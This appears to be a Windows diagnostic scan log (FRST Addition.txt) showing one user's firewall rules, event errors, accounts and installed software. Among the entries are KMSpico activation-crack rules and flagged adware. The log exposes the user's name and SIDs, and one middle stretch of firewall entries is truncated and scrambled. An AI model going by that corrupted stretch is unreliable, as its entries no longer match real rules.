HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "S
creencast-O-Matic Tray"
HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "V
See"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. T
he file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{CED17A21-3FAE-49CF-9ECA-A918423B2CBF}] => (Allow) %systemroot%\
system32\alg.exe
FirewallRules: [UDP Query User{A3AD89B2-EF64-4B02-8C8D-76D6EA791ABC}C:\program f
iles (x86)\connectify\connectify.exe] => (Allow) C:\program files (x86)\connecti
fy\connectify.exe
FirewallRules: [TCP Query User{4EEFEEBC-829D-4AC5-A501-D7DD392F3F65}C:\program f
iles (x86)\connectify\connectify.exe] => (Allow) C:\program files (x86)\connecti
fy\connectify.exe
FirewallRules: [{26CBC116-A886-41F6-901D-44B8945880D9}] => (Allow) C:\Program Fi
les (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A1865D0E-DFB8-4358-AC73-2FA0CB843CC6}] => (Allow) C:\Program Fi
les (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{49110ED6-5883-4612-874C-AB647A68DF25}] => (Allow) C:\Program Fi
les (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{ED159E10-39F8-4B76-A3B3-F971B8CAE1AB}] => (Allow) C:\Program Fi
les (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{F924F07A-D2A8-420C-9B88-11AD4B2C8370}] => (Allow) C:\Program Fi
les (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{2C6DE3EC-72A5-4457-8146-3389688D98CC}] => (Allow) C:\Program Fi
les (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{07D4D389-98EA-40A9-83BA-D730EC5C9630}] => (Allow) LPort=1688
FirewallRules: [{C109F93D-9100-431D-B61E-83C93D6E996A}] => (Allow) C:\Program Fi
les\KMSpico\AutoPico.exe
FirewallRules: [{7180087A-69A0-49FC-A8C0-88DDD581BDD7}] => (Allow) C:\Program Fi
les\KMSpico\AutoPico.exe
FirewallRules: [{81227772-2DAA-4A12-AF45-6FD4A355B49D}] => (Allow)
les\KMSpico\Service_KMS.exe
FirewallRules: [{9BACA3F2-6A32-43D2-9A57-FE02F540F858}] => (Allow)
les\KMSpico\Service_KMS.exe
FirewallRules: [{EF122BC9-8ED2-4F76-9A83-979E295D2594}] => (Allow)
les\KMSpico\KMSELDI.exe
FirewallRules: [{BC44951D-BA85-4509-A961-CC23E6570D30}] => (Allow)
les\KMSpico\KMSELDI.exe
FirewallRules: [{FB9C1AA6-B1DC-4FAF-823C-D769CA11ED7F}] => (Allow)
FirewallRules: [{EAB34039-D997-49A7-96B5-57F98CCD1402}] => (Allow)
les (x86)\HP\hp software update\hpwucli.exe
FirewallRules: [{CAA82361-BF4D-4259-A3DF-830A363F74C4}] => (Allow)
les (x86)\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{50EE1F7B-EEDB-46A0-99F8-FEA2C0BD925D}] => (Allow)
les (x86)\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{29B0DB79-257F-40D0-AA83-C1AD16D8ADD7}] => (Allow)
les (x86)\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{52D27317-8D42-43FF-A895-4BB64E868B1E}] => (Allow)
FirewallRules: [{3CF0ED6F-3D1A-4F51-9E5E-4C2BD0B5C806}] => (Allow)
les (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{7C4E8E3C-1BB7-4E4C-AE79-DF4AC5C9B8D4}] => (Allow)
les (x86)\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{B631FD5E-2E77-4114-A834-AAEDAE48BAF6}] => (Allow)
les (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{D063D9A9-8BBB-481E-933B-CD7F0967A396}] => (Allow)
les (x86)\Microsoft Office\Office15\lync.exe
FirewallRules: [{07E6D6A7-E7EF-4A4F-91A2-25057ED1E21F}] => (Allow)
les (x86)\Intel\IntelAppStore\bin\ismagent.exe
FirewallRules: [{21B98EFC-048E-4BE2-BC33-0890B808A00D}] => (Allow)
les (x86)\Spotify\spotify.exe
FirewallRules: [{74E32F51-08BF-496A-A141-2D2EAF121968}] => (Allow)
les (x86)\Spotify\spotify.exe
FirewallRules: [{ED275BE1-9260-49CD-8405-134CE78CD8F7}] => (Allow)
les (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{D288FF71-31C1-4DF5-AFC5-175747EFA260}] => (Allow)
les (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{69B5AC7F-E405-4421-A111-09A6F9EEDD62}] => (Allow)
RIEN\AppData\Local\Temp\nsd3F3F.tmp\CnetInstaller-75715872.exe
FirewallRules: [{E6B96284-A2D9-4F0E-9CA7-813B79BC8EF0}] => (Allow)
RIEN\AppData\Local\Temp\nsd3F3F.tmp\CnetInstaller-75715872.exe
FirewallRules: [{8C677F5F-8553-429E-8E5E-7271B10687B7}] => (Allow)
les (x86)\Dynamo Combo\bin\DynamoCombo.BRT.Helper.exe
FirewallRules: [{574FD494-3CA7-4021-8A39-F14DA44AFC16}] => (Allow)
les (x86)\Dynamo Combo\bin\DynamoCombo.BRT.Helper.exe
FirewallRules: [{CD0B6F4B-0009-4EBC-A245-C5562ACE4FB4}] => (Allow)
les (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C3C2D29B-B322-4EB2-B525-2F1273B1F716}] => (Allow)
les (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E9B53418-4574-45A0-8639-DC0D6707F655}] => (Allow)
RIEN\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{F570D4F2-1C74-46C1-BCF1-1120781D9D59}] => (Allow)
RIEN\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{9B9610DF-DAF7-4650-B8EB-BE4B5CAAE391}] => (Allow)
les (x86)\IBM\SPSS\Statistics\20\stats.com
FirewallRules: [{705BE377-AD8B-4F94-90AB-D2EFCB6644B4}] => (Allow)
les (x86)\IBM\SPSS\Statistics\20\WinWrapIDE.exe
FirewallRules: [{02C0309B-F069-4FF4-9696-6487D878C8CE}] => (Allow)
les (x86)\IBM\SPSS\Statistics\20\stats.exe
FirewallRules: [{AEE1A837-3B32-4F4E-84D3-C59B67FC0D4F}] => (Allow)
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
LPort=1688
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
LPort=3306
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Users\REVE
C:\Users\REVE
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Users\REVE
C:\Users\REVE
C:\Program Fi
C:\Program Fi
C:\Program Fi
C:\Program Fi
les (x86)\IBM\SPSS\Statistics\20\stats.com
FirewallRules: [{1283C0F1-9220-4572-9FA4-B585067FC7F4}] => (Allow) C:\Program Fi
les (x86)\IBM\SPSS\Statistics\20\WinWrapIDE.exe
FirewallRules: [{3696728A-EA99-464F-A76A-C4298E33CD6A}] => (Allow) C:\Program Fi
les (x86)\IBM\SPSS\Statistics\20\stats.exe
FirewallRules: [{DC0F0CEB-84AC-4464-8BA3-4402EB74A9D6}] => (Allow) C:\Users\REVE
RIEN\AppData\Local\Temp\7zS7300\HPDiagnosticCoreUI.exe
FirewallRules: [{E5709ADD-BFFA-4A8C-A9B5-7E15E0582DC9}] => (Allow) C:\Users\REVE
RIEN\AppData\Local\Temp\7zS7300\HPDiagnosticCoreUI.exe
FirewallRules: [{DF2B8723-CEC4-4121-B6DB-19FDA93A6270}] => (Allow) C:\Users\REVE
RIEN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{BAB82F17-DE9D-4248-A0CB-8B5879ADB4D5}] => (Allow) C:\Program Fi
les (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{54ABF091-1DF9-4B69-B37B-C41E73C69CB6}] => (Allow) LPort=2869
FirewallRules: [{862B93C9-B9A9-48FA-ADA3-55F921FF41A4}] => (Allow) LPort=1900
FirewallRules: [{6F700F9F-D2C2-468C-B86E-5CA39E1D4741}] => (Allow) C:\Program Fi
les (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{5D10C7CA-B991-4391-B4D4-5C8BB7A03570}] => (Allow) C:\Users\REVE
RIEN\AppData\Local\Temp\nsl43C7.tmp\Installer-10624532.exe
FirewallRules: [{87A90989-487D-4828-AA46-7A469FF67E99}] => (Allow) C:\Users\REVE
RIEN\AppData\Local\Temp\nsl43C7.tmp\Installer-10624532.exe
FirewallRules: [{A33D9D2D-3F09-4532-BFCF-3F5E7EB512D8}] => (Allow) C:\Users\REVE
RIEN\AppData\Local\Temp\nsz302B.tmp\Installer-10624532.exe
FirewallRules: [{AB39E013-B069-4E52-9BE2-E0FFDB0DFFEB}] => (Allow) C:\Users\REVE
RIEN\AppData\Local\Temp\nsz302B.tmp\Installer-10624532.exe
FirewallRules: [{59651CC9-DAE1-45A7-B149-D8FC70DCE492}] => (Allow) C:\Program Fi
les (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{FEC06A52-37E7-4021-ACBD-CD78C3D93BDB}C:\users\rev
erien\appdata\roaming\vseeinstall\vsee.exe] => (Allow) C:\users\reverien\appdata
\roaming\vseeinstall\vsee.exe
FirewallRules: [UDP Query User{45B734E6-71F3-4293-868A-6B2043316142}C:\users\rev
erien\appdata\roaming\vseeinstall\vsee.exe] => (Allow) C:\users\reverien\appdata
\roaming\vseeinstall\vsee.exe
FirewallRules: [{80B7C41D-AE8A-4702-8BB8-17C136318964}] => (Block) C:\users\reve
rien\appdata\roaming\vseeinstall\vsee.exe
FirewallRules: [{EDC8A610-4B6C-4F1E-BD72-B18609B14D31}] => (Block) C:\users\reve
rien\appdata\roaming\vseeinstall\vsee.exe
FirewallRules: [TCP Query User{9CE82D32-5C0E-4E17-8B6D-E4944A71551B}C:\program f
iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Allow) C:\program files
(x86)\ibm\spss\statistics\20\jre\bin\javaw.exe
FirewallRules: [UDP Query User{E86DBDF3-5870-46CB-B2C1-7B01B124FD8B}C:\program f
iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Allow) C:\program files
(x86)\ibm\spss\statistics\20\jre\bin\javaw.exe
FirewallRules: [TCP Query User{4064EA95-343A-4444-AA16-7E87ABDFCDA6}C:\program f
iles (x86)\ibm\spss\statistics\20\stats.exe] => (Block) C:\program files (x86)\i
bm\spss\statistics\20\stats.exe
FirewallRules: [UDP Query User{47DFAE74-EBA1-4001-8308-3316B9D1FC26}C:\program f
iles (x86)\ibm\spss\statistics\20\stats.exe] => (Block) C:\program files (x86)\i
bm\spss\statistics\20\stats.exe
FirewallRules: [TCP Query User{C0110B3C-2BCF-4E80-AEF4-74B2F19B9830}C:\program f
iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Block) C:\program files
(x86)\ibm\spss\statistics\20\jre\bin\javaw.exe
FirewallRules: [UDP Query User{7C67A3A5-4C70-435B-A43A-897049E4F23B}C:\program f
iles (x86)\ibm\spss\statistics\20\jre\bin\javaw.exe] => (Block) C:\program files
(x86)\ibm\spss\statistics\20\jre\bin\javaw.exe
FirewallRules: [TCP Query User{1C739540-6B6E-4658-85DE-AE84B2115A96}C:\program f
iles\java\jre1.8.0_60\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_60
\bin\java.exe
FirewallRules: [UDP Query User{625CADCA-9AD2-4D93-9946-9935A73F3C1A}C:\program f
iles\java\jre1.8.0_60\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_60
\bin\java.exe
FirewallRules: [{9BE26317-4C02-4241-92DB-A8A1FC476E35}] => (Allow) C:\Program Fi
les\KMSnano\qemu-system-i386.exe
FirewallRules: [{0185FCB4-F83E-476C-8C83-7E96F997E750}] => (Allow) C:\Program Fi
les\KMSnano\qemu-system-i386.exe
FirewallRules: [{A94D9EED-B06D-40EF-BC22-696A748AA005}] => (Allow) c:\program fi
les (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe
FirewallRules: [TCP Query User{C5F57E73-72B0-41B8-BC44-8684B97CC4DA}C:\program f
iles (x86)\vectir\vectir.exe] => (Allow) C:\program files (x86)\vectir\vectir.ex
e
FirewallRules: [UDP Query User{739CCF3C-E344-4A02-9C2E-E15BE58C0F42}C:\program f
iles (x86)\vectir\vectir.exe] => (Allow) C:\program files (x86)\vectir\vectir.ex
e
FirewallRules: [TCP Query User{23EA3972-718B-4DC8-8F47-383CBD730E9E}C:\program f
iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\
vlc.exe
FirewallRules: [UDP Query User{F0C8441B-10DA-43D0-ADD9-E489B359C9CC}C:\program f
iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\
vlc.exe
FirewallRules: [{F653B5D8-9AAC-4521-9B17-DFB7DC379077}] => (Allow) C:\Program Fi
les\Bonjour\mDNSResponder.exe
FirewallRules: [{88671DA2-CC5A-49CB-A0C9-48B72A220E78}] => (Allow) C:\Program Fi
les\Bonjour\mDNSResponder.exe
FirewallRules: [{91A5D443-9D77-4A0B-8E80-B5D3392DD370}] => (Allow) C:\Program Fi
les (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{87EF9B94-EE96-466E-BD82-8CE5117E7A10}] => (Allow) C:\Program Fi
les (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [TCP Query User{70B2A856-2AF0-424D-8629-2DB1B396EC82}C:\program f
iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\
vlc.exe
FirewallRules: [UDP Query User{10211271-2BDC-42C2-B961-8DB4582E4C2F}C:\program f
iles (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\
vlc.exe
==================== Restore Points =========================
ATTENTION: System Restore is disabled
==================== Faulty Device Manager Devices =============
Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which
starts the Hardware Update wizard.
==================== Event log errors: =========================
Application errors:
==================
Error: (04/06/2016 03:17:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: 788: ERROR: read_msg errno 0 (The operation completed successfully.
)
Error: (04/06/2016 03:17:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: ERROR: mDNSPlatformReadTCP - recv: 10053
Error: (04/06/2016 03:16:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: 776: ERROR: read_msg errno 0 (The operation completed successfully.
)
Error: (04/06/2016 03:16:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: ERROR: mDNSPlatformReadTCP - recv: 10053
Error: (04/06/2016 03:13:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: 776: ERROR: read_msg errno 0 (The operation completed successfully.
)
Error: (04/06/2016 03:13:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: ERROR: mDNSPlatformReadTCP - recv: 10053
Error: (04/06/2016 03:12:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: 1016: ERROR: read_msg errno 0 (The operation completed successfully
.)
Error: (04/06/2016 03:12:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: ERROR: mDNSPlatformReadTCP - recv: 10053
Error: (04/06/2016 03:11:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: 976: ERROR: read_msg errno 0 (The operation completed successfully.
)
Error: (04/06/2016 03:11:59 PM) (Source: Bonjour Service) (EventID: 100) (User:
)
Description: ERROR: mDNSPlatformReadTCP - recv: 10053
System errors:
=============
Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031
) (User: )
Description: The User Data Access_560cb16 service terminated unexpectedly. It ha
s done this 1 time(s). The following corrective action will be taken in 10000 mi
lliseconds: Restart the service.
Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031
) (User: )
Description: The User Data Storage_560cb16 service terminated unexpectedly. It h
as done this 1 time(s). The following corrective action will be taken in 10000 m
illiseconds: Restart the service.
Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031
) (User: )
Description: The Contact Data_560cb16 service terminated unexpectedly. It has do
ne this 1 time(s). The following corrective action will be taken in 10000 millis
econds: Restart the service.
Error: (04/06/2016 09:27:29 AM) (Source: Service Control Manager) (EventID: 7031
) (User: )
Description: The Sync Host_560cb16 service terminated unexpectedly. It has done
this 1 time(s). The following corrective action will be taken in 10000 milliseco
nds: Restart the service.
Error: (04/06/2016 09:27:28 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHOR
ITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D5
20160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost
(Using LRPC)UnavailableUnavailable
Error: (04/05/2016 08:58:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHOR
ITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D5
20160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost
(Using LRPC)UnavailableUnavailable
Error: (04/05/2016 05:02:15 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHOR
ITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D5
20160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost
(Using LRPC)UnavailableUnavailable
Error: (04/05/2016 03:08:37 PM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the comp
uter ACER
that believes that it is the master browser for the domain on transport NetBT_Tc
pip_{D3A7E1A2-BF66-4FA4-B421-289C91B29B3B}.
The master browser is stopping or an election is being forced.
Error: (04/05/2016 02:40:17 PM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the comp
uter LENOVO
that believes that it is the master browser for the domain on transport NetBT_Tc
pip_{C7344E23-A6A5-4EEE-9867-288EC4D5B277}.
The master browser is stopping or an election is being forced.
Error: (04/05/2016 01:02:47 PM) (Source: Service Control Manager) (EventID: 7031
) (User: )
Description: The UpdateSvc service terminated unexpectedly. It has done this 2 t
ime(s). The following corrective action will be taken in 60000 milliseconds: Res
tart the service.
CodeIntegrity:
===================================
Date: 2016-04-06 09:07:15.285
Description: Code Integrity determined that a process (\Device\HarddiskVolume4
\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV
olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing
level requirements.
Date: 2016-04-06 09:07:15.243
Description: Code Integrity determined that a process (\Device\HarddiskVolume4
\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV
olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing
level requirements.
Date: 2016-04-04 14:22:01.468
Description: Code Integrity determined that a process (\Device\HarddiskVolume4
\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV
olume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that di
d not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-04-04 12:03:02.209
Description: Code Integrity determined that a process (\Device\HarddiskVolume4
\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV
olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing
level requirements.
Date: 2016-04-04 12:03:02.171
Description: Code Integrity determined that a process (\Device\HarddiskVolume4
\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV
olume4\Windows\Provider.dll that did not meet the Custom 3 / Antimalware signing
level requirements.
Date: 2016-04-02 20:08:57.152
Description: Code Integrity determined that a process (\Device\HarddiskVolume4
\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV
olume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that di
d not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-03-30 14:43:23.764
Description: Code Integrity is unable to verify the image integrity of the fil
e \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-pag
e image hashes could not be found on the system.
Date: 2016-03-30 14:29:38.240
Description: Code Integrity determined that a process (\Device\HarddiskVolume4
\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskV
olume4\Program Files\Common Files\microsoft shared\OFFICE15\MSOXMLMF.DLL that di
d not meet the Custom 3 / Antimalware signing level requirements.
Date: 2016-03-30 13:46:03.397
Description: Code Integrity is unable to verify the image integrity of the fil
e \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-pag
e image hashes could not be found on the system.
Date: 2016-03-30 13:37:25.565
Description: Code Integrity is unable to verify the image integrity of the fil
e \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-pag
e image hashes could not be found on the system.
==================== Memory info ===========================
Processor: Intel(R) Celeron(R) CPU 1000M @ 1.80GHz
Percentage of memory in use: 53%
Total physical RAM: 6027.22 MB
Available physical RAM: 2815.9 MB
Total Virtual: 8587.22 MB
Available Virtual: 4472.3 MB
==================== Drives ================================
Drive c: (TI31061100A) (Fixed) (Total:119.2 GB) (Free:20.51 GB) NTFS
Drive e: () (Fixed) (Total:166.29 GB) (Free:10.71 GB) NTFS
Drive h: () (Removable) (Total:7.44 GB) (Free:4.04 GB) FAT32
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 00000000)
Partition: GPT.
========================================================
Disk: 1 (Size: 7.5 GB) (Disk ID: 00000000)
Partition: GPT.
==================== End of Addition.txt ============================
Ran by REVERIEN (2016-04-06 15:16:27)
Running from C:\Users\REVERIEN\Desktop
Windows 10 Home Version 1511 (X64) (2016-01-04 12:15:29)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-1240968423-981972810-3087361095-500 - Administrator - Di
sabled)
DefaultAccount (S-1-5-21-1240968423-981972810-3087361095-503 - Limited - Disable
d)
Guest (S-1-5-21-1240968423-981972810-3087361095-501 - Limited - Disabled) => C:\
Users\Guest
HomeGroupUser$ (S-1-5-21-1240968423-981972810-3087361095-1003 - Limited - Enable
d)
REVERIEN (S-1-5-21-1240968423-981972810-3087361095-1001 - Administrator - Enable
d) => C:\Users\REVERIEN
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF4
6}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF4
6}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to un
hide them. The adware programs should be uninstalled manually.)
Adobe Flash Player 21 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 21
.0.0.197 - Adobe Systems Incorporated)
Adobe Photoshop 7.0 CE (HKLM-x32\...\Adobe Photoshop 7.0 CE) (Version: 7.0 CE Adobe Systems, Inc.)
Adobe Reader 9.4.0 (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-A94000000001}) (Versio
n: 9.4.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1
.7.157 - Adobe Systems, Inc.)
Aloha TriPeaks (x32 Version: 2.2.0.98 - WildTangent) Hidden
Apache Tomcat 6.0 (remove only) (HKLM\...\Apache Tomcat 6.0) (Version: - )
Apple Application Support (32-bit) (HKLM-x32\...\{649A1FD9-5892-46AD-8DF0-C4A43F
F61CB7}) (Version: 4.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{0DE0A178-AC7B-4650-806C-CF226DE037
66}) (Version: 4.1 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Ver
sion: 2.1.4.131 - Apple Inc.)
ArcGIS 10.1 for Desktop (HKLM-x32\...\ArcGIS 10.1 for Desktop) (Version: 10.1.30
35 - Environmental Systems Research Institute, Inc.)
ArcGIS 10.1 for Desktop (x32 Version: 10.1.3035 - Environmental Systems Research
Institute, Inc.) Hidden
ArcGIS 10.1 License Manager (HKLM-x32\...\ArcGIS 10.1 License Manager) (Version:
10.1.2891 - Environmental Systems Research Institute, Inc.)
ArcGIS 10.1 License Manager (x32 Version: 10.1.2891 - Environmental Systems Rese
arch Institute, Inc.) Hidden
Auslogics Duplicate File Finder (HKLM-x32\...\{6845255F-15CC-4DD1-94D5-D38F37011
8B3}_is1) (Version: 5.0.1.0 - Auslogics Labs Pty Ltd)
Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Ap
ple Inc.)
BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
Cambridge Advanced Learner's Dictionary (HKLM-x32\...\Cambridge Advanced Learner
's Dictionary) (Version: - )
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Destinations (x32 Version: 140.0.0.0 - Hewlett-Packard) Hidden
DNS Unlocker version 1.4 (HKLM-x32\...\{E1527582-8509-4011-B922-29E3FB548882}_is
1) (Version: 1.4 - www.dnsunlocker.com) <==== ATTENTION
DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden
Dropbox (HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\Dropbox) (Version
: 3.16.1 - Dropbox, Inc.)
Easy File Locker 1.5 (HKLM-x32\...\Easy File Locker) (Version: 1.5 - XOSLAB.COM)
Empress of the Deep - The Darkest Secret (x32 Version: 2.2.0.98 - WildTangent) H
idden
Everything 1.3.4.686 (x64) (HKLM\...\Everything) (Version: - )
Google Chrome (HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\Google Chro
me) (Version: 49.0.2623.110 - Google Inc.)
Google Drive (HKLM-x32\...\{895D0391-459F-4D45-B8DD-13F0DE70C66E}) (Version: 1.2
8.1549.1322 - Google, Inc.)
Google Earth (HKLM-x32\...\{817750FA-EC6A-485D-9901-0683AE6FFDF1}) (Version: 7.1
.5.1557 - Google)
Google Talk Plugin (HKLM-x32\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Versio
n: 5.41.3.0 - Google)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
GPL Ghostscript (HKLM\...\GPL Ghostscript 9.18) (Version: 9.18 - Artifex Softwar
e Inc.)
HP Commercial Scanjet 5590 TWAIN Driver (HKLM-x32\...\HP Commercial Scanjet 5590
TWAIN Driver) (Version: - )
HP Imaging Device Functions 14.5 (HKLM\...\HP Imaging Device Functions) (Version
: 14.5 - HP)
HP Update (HKLM-x32\...\{B0069CFA-5BB9-4C03-B1C6-89CE290E5AFE}) (Version: 5.002.
006.003 - Hewlett-Packard)
hpg5590 (x32 Version: 140.000.000.000 - Hewlett-Packard) Hidden
HPScanjet5590Corporate11 (HKLM-x32\...\{16551913-D97B-4E8A-B751-44CBDC99CF5C}) (
Version: 2.20.0000 - HP)
IBM SPSS Statistics 20 (HKLM-x32\...\{2AF8017B-E503-408F-AACE-8A335452CAD2}) (Ve
rsion: 20.0.0.0 - IBM Corp)
iFree Skype Recorder 6.0.15 (HKLM-x32\...\iFree Skype Recorder) (Version: 6.0.15
- iFree Skype Recorder)
Intel AppUp(R) center (HKLM-x32\...\Intel AppUp(R) center 41663) (Version: 3.8.0
.41663.61 - Intel)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E
4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}
) (Version: 10.18.10.4276 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4
A49FC}) (Version: 11.5.2.1001 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D04933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: )
Island Tribe (x32 Version: 2.2.0.98 - WildTangent) Hidden
istartpageing (HKLM-x32\...\istartpageing) (Version: 1.0.0.6 - ) <==== ATTENTION
Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Ver
sion: 8.0.600.27 - Oracle Corporation)
Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version:
8.0.600.27 - Oracle Corporation)
Java SE Development Kit 8 Update 60 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A00B0D0180600}) (Version: 8.0.600.27 - Oracle Corporation)
Jewel Quest Solitaire 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hi
dden
